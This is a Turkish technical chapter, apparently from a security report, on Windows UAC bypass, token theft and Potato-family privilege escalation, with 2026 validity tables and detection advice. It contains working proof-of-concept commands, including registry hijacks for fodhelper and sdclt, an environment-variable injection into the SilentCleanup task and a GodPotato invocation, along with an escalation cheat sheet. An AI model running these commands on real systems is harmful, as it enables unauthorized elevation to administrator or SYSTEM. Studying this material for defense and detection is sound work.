1.1 Yönetici Özeti
UAC bypass ve token manipülasyonu, saldırganın Medium Integrity Level (Medium-IL) sınırını aşarak High-IL (yönetici) veya SYSTEM seviyesine ulaşmasını sağlayan, sıklıkla birlikte kullanılan iki ayrı teknik ailesidir.
Çekirdek çerçeve (Microsoft yaklaşımı):
UAC elevation bir security boundary değil kullanıcıyı yanlışlıkla yönetici işlemleri yapmaktan korumaya yönelik bir güvenlik önlemidir.
Pratik sonuçlar:
UAC bypass raporları çoğunlukla CVE almaz; MSRC genellikle won't fix / by design yanıtı verir.
"Unfixed" ≠ tespit edilemez demek degildir. EDR, Defender ve ASR davranışsal olarak yakalayabilir.
"Unfixed" ≠ operasyonel olarak güvenilir degildir. ASR ve EDR farkları çoğu varyasyonu yakalar/engeller.
Detection için düzeltme:
UAC bypass klasik anlamda kernel privilege escalation değildir. Kırılan şey integrity boundary değil, user-mode trust chain'dir:
Katman | Değeri |
|---|---|
Integrity Level (MIC) | Nesne erişim sınırı (Low / Medium / High / System) |
Token privileges | Sistem yetenekleri ( |
UAC elevation | Güven sınırı simülasyonu (onay veya auto-elevate ile token geçişi) |
2026 bağlamı — Administrator Protection (AP):
Microsoft, Windows 11 25H2 ile KB5067036 (Ekim 2025) kapsamında AP'yi tanıttı: auto-elevation kaldırma, SMAA ile profil ayrımı, interaktif onay (Windows Hello vb.). Google Project Zero (James Forshaw) preview aşamasında 9 bypass buldu; Microsoft tamamını yamalandı.
1 Aralık 2025: AP, uyumluluk sorunları (WebView2 vb.) nedeniyle geçici olarak geri alındı (Microsoft Learn). Bu şu anlama gelir:
Klasik UAC bypass sınıfı çoğu güncel Win11 kurulumunda fiilen geçerlidir.
Geçerli olmak güvenilir olduğu anlamına gelmez — ASR, Defender ve EDR hâlâ sınırlar.
AP yeniden açıldığında matris kökten değişir; compensating control ertelenmemelidir.
Post-compromise pratik zincir:
Initial access
↓
Privilege discovery (whoami /priv, grup üyeliği, servis context)
↓
Conditional escalation attempt
├─ UAC bypass (split-token admin → High-IL)
├─ Potato / token theft (servis ctx / High-IL admin → SYSTEM)
└─ Fallback: credential abuse, lateral movement, cloud pivot1.2 Evrensel Ön Koşullar
En sık hata: bu teknikleri ön koşulsuz "çalışan exploit" sanmak.
Teknik ailesi | Kim exploit edebilir? | UAC modu | Always Notify (2) | Çıktı |
|---|---|---|---|---|
Registry hijack (fodhelper vb.) | Split-token yerel admin | Default (5) / Lower | Çoğunu keser | High-IL — SYSTEM değil |
SilentCleanup | Split-token admin | Çoğu registry bypass'ı keser | Çalışabilir | High-IL — SYSTEM değil |
Token theft (T1134.001) | High-IL admin + genelde | İlgisiz | İlgisiz | Hedef token (çoğu durumda SYSTEM) |
Potato ailesi |
| İlgisiz | İlgisiz | SYSTEM |
SID-History (T1134.005) | Domain admin (EA) | İlgisiz | İlgisiz | Domain çapında yetki yükseltme |
Farkındalık notu: Standart (admin olmayan) kullanıcıyla UAC bypass mümkün değildir. Kullanıcı Administrators grubunda olmalı; bypass yalnızca onay diyaloğunu atlar, sıfırdan yetki vermez.
RID 500 istisnası: Yerleşik Administrator hesabı, FilterAdministratorToken=1 ayarlanmadıkça zaten tam (High-IL) token ile çalışır bypass'a ihtiyacı yoktur.
Engagement öncesi zorunlu kontroller: Hedef build, UAC seviyesi, Defender/ASR durumu, AP durumu ve servis context'i doğrulanmalı. UACMe metod numaraları sürümden sürüme değişir; engagement öncesi güncel README kontrol edilmelidir.
1.3 UAC Mimarisi — Exploit'in Dayandığı Zemin
Bütünlük seviyeleri (Mandatory Integrity Control)
Seviye | SID | Tipik süreç |
|---|---|---|
Low (1) | S-1-16-4096 | Sandbox, AppContainer |
Medium (2) | S-1-16-8192 | Normal kullanıcı süreci (varsayılan) |
High (3) | S-1-16-12288 | UAC onaylı / auto-elevate yönetici |
System (4) | S-1-16-16384 | lsass.exe, servisler |
Protected (5) | S-1-16-20480 | Nadiren; yalnızca kernel-mode setter |
Not: PPL/Protected Process, MIC'ten ayrı bir mekanizmadır ve sadece integrity level ile açıklanamaz; process protection level ayrıca değerlendirilmelidir.
Split-token modeli
Admin kullanıcılar UAC açıkken iki linked token taşır:
Filtrelenmiş (Medium-IL): Admin grup üyelikleri DenyOnly
Tam (High-IL): Tüm ayrıcalıklar aktif, LinkedToken ile bağlı, onay veya auto-elevate ile devreye girer.
Elevation akışı (consent.exe / AppInfo)
Yükseltme talebi
→ Shell → appinfo.dll (AppInfo/AIS) RAiLaunchAdminProcess RPC
→ Manifest: requestedExecutionLevel + autoElevate
→ [MS imzalı + autoElevate=true + güvenilen dizin] → DİYALOG YOK
→ Aksi halde → consent.exe → kullanıcı onayı
→ Onay → High-IL child süreçAuto-elevate üçlüsü (üçü birden gerekir):
1. Trusted path (
C:\Windows\System32\,C:\Program Files\)2. Geçerli Microsoft dijital imzası
3. Manifest:
autoElevate="true"
1.4 Kök Neden ve HKCU Önceliği
UAC gerçek izolasyon (kernel/user, VBS) gerektirmez; tasarımsal zayıflıklar çoğu zaman CVE olmaz.
HKCU önceliği: Microsoft imzalı autoElevate=true binary'ler belirli execution path'lerde HKCU veya user-writable registry okur. Medium-IL saldırgan HKLM'e yazamaz; HKCU'ya tam erişir. Yüksek yetkili sürecin manipüle edilmiş HKCU kaynağından komut çalıştırması sık görülen logical hijack pattern'idir.
+-----------------------------------------------------------------------+
| Medium-IL Process |
| (örn. ele geçirilmiş shell / malware) |
+----------------------------------+------------------------------------+
| 1. Registry / Environment yazımı
v
+-----------------------------------------------------------------------+
| HKCU\...\Classes VEYA HKCU\Environment |
+----------------------------------+------------------------------------+
| 2. Auto-elevate binary tetikle
v
+-----------------------------------------------------------------------+
| Auto-Elevate Binary (örn. fodhelper.exe) |
| - Sessiz High-IL (UAC prompt yok) |
| - Hijack edilmiş HKCU / env değerini okur |
+----------------------------------+------------------------------------+
| 3. Payload High-IL'de çalışır
v
+-----------------------------------------------------------------------+
| High-IL Child Process |
+-----------------------------------------------------------------------+
Hedef: SYSTEM değil Medium-IL (filtrelenmiş token) ile → High-IL (tam admin token) elde etmek, consent prompt olmadan.1.5 UAC Bypass Aileleri (MITRE T1548.002)
1.5.1 fodhelper / computerdefaults
ms-settings handler üzerinden klasik hijack modeli.
Medium-IL saldırgan
→ HKCU\Software\Classes\ms-settings\Shell\Open\command
(default) = payload
DelegateExecute = "" ← ZORUNLU; yoksa exploit fail
→ fodhelper.exe veya computerdefaults.exe başlat
→ Shell API ms-settings handler → HKCU öncelikli
→ payload High-IL childParametre | Değer |
|---|---|
UACMe #33, #62, #67, #70 | Güncel branch'te unfixed |
OS patch | Resmi CVE yok |
Ön koşul | Split-token admin, UAC ≠ Always Notify (2) |
PoC (yalnızca yetkili lab):
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" `
-Name "DelegateExecute" -Value "" -PropertyType String -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" `
-Name "(default)" -Value "C:\Windows\System32\cmd.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"Procmon gerçekliği: fodhelper.exe başlar başlamaz HKCU\...\ms-settings\Shell\Open\command okunur; SUCCESS sonrası (default) değeri High-IL'de çalıştırılır.fodhelper exit sonrası child'ın parent'ı "Non-existent" görünebilir bu sebepten inceleyebilmek icin Sysmon/Event log gerekir.
Operasyonel gerçeklik:
Ortam | Beklenti |
|---|---|
Win10, Defender kapalı | Genelde çalışır |
Win11, Defender açık | Deploy veya runtime'da yakalanma riski yüksek |
Obfuscation / VT 3/73 | Statik skor düşük ≠ güvenli; Sigma/davranışsal kural elevation anında yakalar |
IR | Malware silinse bile registry kalıntısı kalabilir |
1.5.2 eventvwr (mscfile handler) güncel OS'te kapatıldı
Varyant | UACMe | Durum |
|---|---|---|
Registry hijack (Enigma0x3) | #25 | Win10 RS2 build 15031, |
DLL hijack (elsext.dll) | #13 | RS1 (14316); farklı teknik |
.NET deserialization | #83 | Win11 24H2'de kapatıldı |
1.5.3 sdclt icin doğru varyantı bilmek şart
Varyant | Registry | UACMe | Durum |
|---|---|---|---|
App Paths |
| #29 | RS3 (16215) yamalı — ölü |
isolatedCommand |
| #31 | RS4 (17025) yamalı |
Folder shell hijack |
| #53 | Unfixed |
PoC (#53):
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c ..." /f
reg add "HKCU\Software\Classes\Folder\shell\open\command" /v DelegateExecute /f
sdclt.exe1.5.4 SilentCleanup
Sınıflandırma: T1548.002 altında, registry-hijack'ten farklı bir mekanizma: scheduled task + HKCU environment injection. Always Notify modunda da çalışabilir (UACMe #34, James Forshaw/"Tyranid"-Project Zero analiziyle tutarlı; Metasploit'te bypassuac_silentcleanup modülü olarak da bilinir).
Kritik düzeltme: SYSTEM vermez — High-IL verir.
reg add "HKCU\Environment" /v windir /d "C:\Windows\System32\cmd.exe &&REM " /f
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanupÖğe | Değer |
|---|---|
Ön koşul | Split-token admin |
Always Notify | Çoğu registry hijack kesilir; SilentCleanup sürdürebilir |
Not: Forshaw'ın Şubat 2026 tarihli "Bypassing Administrator Protection by Abusing UI Access" analizine göre, AP aktif haldeyken bile SilentCleanup'ın environment-variable zayıflığı düzeltilmemiştir; artık tek başına yeterli olmasa da, bir UI Access + SetWindowsHookEx zinciriyle birleştirilerek AP'yi bypass etmek için kullanılabilmektedir. Yani "AP aktif → registry/env-hijack önlenir" varsayımı SilentCleanup için tam geçerli değildir; mekanizma canlıdır, sadece standalone değildir.
1.5.5 Mock Trusted Directory — 24H2+ yamalı
\\?\C:\Windows \System32\
→ auto-elevate binary + kötücül DLL
→ appinfo path normalizasyonu boşluğu siler
→ High-IL'de DLL yüklenir
Öğe | Değer |
|---|---|
UACMe | #52 |
Win11 24H2/25H2 ve sonrası | Yamalı |
Güncel geçerlilik matrisi (2026 ortası, AP geri alınmış)
Teknik | Win11 default UAC, AP kapalı | Standart user | Always Notify |
|---|---|---|---|
fodhelper / computerdefaults | ✓ (EDR riski yüksek) | ✗ | ✗ |
eventvwr registry | ✗ (yamalı) | ✗ | ✗ |
sdclt #53 (Folder) | ✓ (koşullu) | ✗ | ✗ |
SilentCleanup | ✓ (High-IL) | ✗ | ✓ (çalışır) |
Mock Trusted Dir | ✗ (24H2+ yamalı) | ✗ | ✗ |
UACMe sayısı: Google Project Zero'nun Ocak 2026 tarihli yazısına göre UACMe "şu anda 81 ayrı teknik listeliyor." kesin sayıdan çok, projenin "fixed" sayılan metodları her majör sürümde listeden tamamen sildiği davranışı önemlidir (yani kalanlar tanım itibarıyla o anki sürümde unfixed'dir).
Recon örnek :
CMD
strings.exe C:\Windows\System32\*.exe | findstr /i autoElevateautoElevate=true taşıyan her binary hedef adayıdır; gerçek istismar için HKCU/HKCR, environment variable, DLL search order, COM veya Shell API gibi user-writable bir trust-chain etkileşimi gerekir. Manifest bulmak, exploit anlamına gelmemektedir. UiAccess=true binary'ler ayrı yüzey oluşturur.
1.6 Token Modeli ve Manipülasyonu (MITRE T1134)
UAC sonrası (High-IL) veya SeImpersonatePrivilege olan servis hesabında hedef genelde SYSTEM'dir.
Tür | Kullanım | Tipik API |
|---|---|---|
Primary | Sürecin asıl güvenlik bağlamı |
|
Impersonation | Thread geçici taklit |
|
Impersonation → Primary: DuplicateTokenEx(..., TokenPrimary, ...)
T1134.001 — Token hırsızlığı
Ön koşul: "Local admin" yetkisi yetmez hedef SYSTEM sürecine erişebilmek için genelde High-IL + SeDebugPrivilege gerekir..
OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, ..., target_PID)
→ OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_QUERY, &hToken)
→ DuplicateTokenEx(..., TokenPrimary, &hDupToken)
→ [Yol A] CreateProcessWithTokenW
→ SeImpersonatePrivilege + Secondary Logon (seclogon) servisi ÇALIŞIYOR olmalı
→ [Yol B] CreateProcessAsUserW
→ SeAssignPrimaryTokenPrivilege + SeIncreaseQuotaPrivilegeTipik hedefler: services.exe, winlogon.exe, lsass.exe — PPL ve Credential Guard bu erişimi engelleyebilir.
Meterpreter getsystem: Tek bir teknik değil degil, token theft, named-pipe impersonation ve potato varyantlarının harmanlanmış bir pipeline'ıdır.
T1134.002 — CreateProcessWithTokenW
Var olan bir token ile doğrudan yeni süreç oluşturma; T1134.001'den farkı thread impersonation değil process creation odaklı olmasıdır..
T1134.003 — LogonUser
Önceki ikisinden farkı: mevcut bir token çalınmaz, geçerli credential gerekir. runas /netonly → LogonType 9 (NewCredentials) bu sınıfa girer.
T1134.005 — SID-History
Domain ortamına özgüdür, yerel UAC bypass ile karıştırılmamalı. SID-History, doğrudan token'a değil, Active Directory'deki kullanıcı/hesap nesnesine (sIDHistory özelliğine) yazılır. Kullanıcı bir sonraki kimlik doğrulamasında (Kerberos/NTLM), bu ek SID'ler token'a eklenir. yüksek ayrıcalıklı domain yetkisi / DS-Add-Sid-History izni / domain migration privilege olarak tanımlanmalıdır. Amac düsük yetkili bir kullanıcının tokenına yüksek yetkili bir kullanıcının SID'sini eklemektir.
Tipik araç: Mimikatz misc::addsid.
1.7 SeImpersonatePrivilege ve Potato Ailesi
SeImpersonatePrivilege, istemciyi taklit edebilmesi için IIS, MSSQL, Exchange, WCF gibi servis hesaplarına varsayılan olarak verilir. Bir web shell veya SQL injection üzerinden çalıştırılan kod bu ayrıcalığı doğrudan miras alır. Web zafiyetinden SYSTEM'e en yaygın köprü.
Servis hesabı (SeImpersonatePrivilege Enabled)
→ SYSTEM kimlik doğrulamasını zorla (COM/RPC/ALPC/pipe)
→ ImpersonateNamedPipeClient / AcceptSecurityContext
→ SYSTEM impersonation token
→ DuplicateTokenEx + CreateProcess* → NT AUTHORITY\SYSTEMAraç | Mekanizma | Windows | Durum |
|---|---|---|---|
Hot Potato | NBNS + WPAD + HTTP→SMB relay | Win7–10, Svr 2008/2012 | MS16-075/077 ile önlendi |
Rotten Potato |
| ≤ Win10 1803 | DCOM port kısıtlamasıyla önlendi |
JuicyPotato | COM + OXID resolver MITM | ≤ Win10 1803 | 1809+ çalışmaz |
RoguePotato | Uzak OXID + sahte RPC sunucu | 1809+, Svr 2019/2022 | Uzak makine / port forward gerekir |
PrintSpoofer | Spooler ALPC → named pipe | Win10/11, Svr 2016–2022 |
|
SweetPotato | Juicy + PrintSpoofer + EfsRpc kombine | Win7 → Svr 2019 | Birleşik fallback aracı |
GodPotato |
| Win8–11, Svr 2012–2022 |
|
RemotePotato0 | DCOM + NTLM relay | Güncel | SYSTEM yetkisi vermez; NTLM hash yakalama amaçlı |
Kritik nokta: PrintSpoofer, Print Spooler servisi (spoolsv.exe) üzerinden çalışır. PrintWorkflowUserSvc tamamen ayrı bir servistir, ilişkili CVE'ler (örn. CVE-2024-49097 ve benzerleri) Potato tekniği değil, bağımsız bir LPE sınıfıdır. Spooler kapalıysa klasik PrintSpoofer çalışmaz.
2026 operasyonel gözlem: Potato ailesi artık "her zaman güvenilir SYSTEM escalation" olarak değerlendirilmemeli ortam bağımlılığı (RPC sıkılaştırması, EDR'nin process/token API'leri üzerindeki davranışsal izlemi, NTLM relay kısıtları) güvenilirliği düşüren bir genel eğilimdir.
GodPotato PoC :
GodPotato.exe -cmd "cmd /c whoami"
:: Beklenen çıktı: nt authority\systemÖn koşul: SeImpersonatePrivilege etkin + rpcss servisi çalışıyor.
Potato diyagramı
+-----------------------------------------------------------------------+
| Service Account (SeImpersonate Enabled) |
| (IIS / MSSQL Web Shell) |
+----------------------------------+------------------------------------+
| 1. COM/RPC/ALPC tetikle
v
+-----------------------------------------------------------------------+
| SYSTEM Service (örn. RPCSS / spoolsv) |
| SYSTEM hesabı saldırganın named pipe'ına authenticate olur |
+----------------------------------+------------------------------------+
| 2. Pipe bağlantısı
v
+-----------------------------------------------------------------------+
| Attacker's Named Pipe |
| ImpersonateNamedPipeClient() → SYSTEM impersonation token |
+----------------------------------+------------------------------------+
| 3. DuplicateTokenEx + CreateProcess*
v
+-----------------------------------------------------------------------+
| NT AUTHORITY\SYSTEM |
+-----------------------------------------------------------------------+1.8 Destek Gizleme Primitive'leri (Delivery Katmanı)
UAC bypass tek başına nadiren kullanılır:
Teknik | MITRE | Özet |
|---|---|---|
ADS (Alternate Data Stream) | T1564.004 |
|
Encoding / obfuscation | T1027 | Statik AV/VT skorunu düşürür; runtime davranış tespiti devam eder |
Parent process maskeleme | — | fodhelper exit → child parent "Non-existent" görünebilir |
1.9 Administrator Protection — 2026 Bağlamı
Dönem | Durum |
|---|---|
Ekim 2025 (KB5067036) | AP preview yayınlandı. auto-elevation kaldırma, SMAA, interaktif onay |
Kasım–Aralık 2025 | Google Project Zero 9 bypass buldu → tamamı yamalandı |
1 Aralık 2025 | Uyumluluk sorunları (WebView2 ve benzeri) nedeniyle AP geçici olarak geri alındı |
2026 ortası | Klasik registry-hijack bypass sınıfı çoğu güncel kurulumda fiilen geçerli; AP'nin yeniden açılma takvimi belirsiz |
Mitigasyon kapsamı (AP aktifken): Microsoft'un kendi açıklamasına göre, AP aktifken test edilen 79 bilinen UAC bypass'ından 78'i tam veya kısmen mitigasyona uğramıştır. Geriye kalan tek açık konu, token manipülasyonu (T1134) saldırı sınıfıyla ilgilidir ve ayrı MSRC vakaları olarak takip edilmektedir. Bu, AP'nin bile token-tabanlı tekniklere karşı henüz tam bir çözüm sunmadığını gösteriyor.
AP aktif olduğunda (senaryo):
fodhelper, sdclt, SilentCleanup gibi registry/environment-hijack mimarileri büyük ölçüde işlevsizleşir.
Saldırı yüzeyi bellek-içi zafiyetlere, token üreten LPE'lere ve AP'ye özgü bypass araştırmasına kayar.
Token manipülasyonu sınıfı (T1134) AP ile de tam kapanmıyor, bu sınıf savunma önceliğini korumalı.
Savunma ilkesi: AP'ye güvenmeyin; şu anki durumda (AP devre dışı) ve gelecekte (AP aktif, token manipülasyonu hâlâ açık) compensating control'ler gereklidir
1.10 Sömürü Özeti — Cheat Sheet
Mevcut yetki | Hedef | Primitive (2026) | Kritik ön koşul |
|---|---|---|---|
Medium-IL admin (split-token) | High-IL | fodhelper (#33) veya SilentCleanup (#34) | UAC ≠ Always Notify (SilentCleanup için istisna); AP kapalı |
High-IL admin | SYSTEM | Token theft + |
|
Service account | SYSTEM | GodPotato / PrintSpoofer (spoolsv açık) |
|
Standart user | High-IL / SYSTEM | UAC bypass mümkün değil | Kernel LPE veya credential theft gerekir |
1.11 Bölüm 1 Sonuçları
Saldırgan perspektifi:
UAC bypass = split-token admin'i sessizce High-IL'e taşımak; SYSTEM vermez.
SYSTEM = Potato (servis bağlamı) veya token theft (farklı ön koşullar) gerektirir.
2026'da koşullu/geçerli yollar: fodhelper, SilentCleanup, sdclt #53, servis bağlamında GodPotato.
"Unfixed" ≠ "güvenilir" — obfuscation davranışsal tespiti yenmez.
AP şu an geri alınmış; aktif olduğunda bu sınıfın değeri ciddi düşer ama token manipülasyonu sınıfı AP ile de tam kapanmıyor.
Savunma (diger bölümlerde):
Standart kullanıcıya karşı bu teknikler işe yaramaz. Bu tehdit modelinin merkezinde olmalıdır.
"Unfixed" ≠ "görünmez" — registry write + integrity-level geçişi her zaman bir sinyal üretir.
IR sürecinde malware silinmiş olsa bile HKCU hijack kalıntıları kontrol edilmeli.
Tek-binary kuralı (sadece fodhelper) yetersiz kalır.
autoElevate/UiAccessenvanteri şart.PrintSpoofer ↔ PrintWorkflowUserSvc karışıklığına dikkat edilmeli farklı kontrol gerektirirler.
AP aktif olsa bile SilentCleanup zinciri tamamen ölmüyor UI Access +
SetWindowsHookExkombinasyonu izlenmeliDefender/MDE'nin çoğu "unfixed" UACMe tekniğini varsayılan konfigürasyonla zaten yakaladığı somut test verisileriyle doğrulandı
UAC bypass ile AP bypass'ı ayrı tehdit sınıfları olarak ele alınmalı; AP bypass'ları MSRC tarafında farklı bir önem derecesiyle işlenebilir
1.12 Tek cümlelik gerçek
UAC bypass 2026'da bir "elevation exploit" değil, user-mode trust chain suistimalidir: "unfixed" teknik ayaktadır ama operasyonel olarak her zaman güvenilir değildir; SYSTEM için Potato veya token theft gerekir; Administrator Protection şu an geri alınmış olsa da veya aktif olsa bile token manipülasyonu sınıfı kapanmadığından compensating control'ler ertelenmemelidir.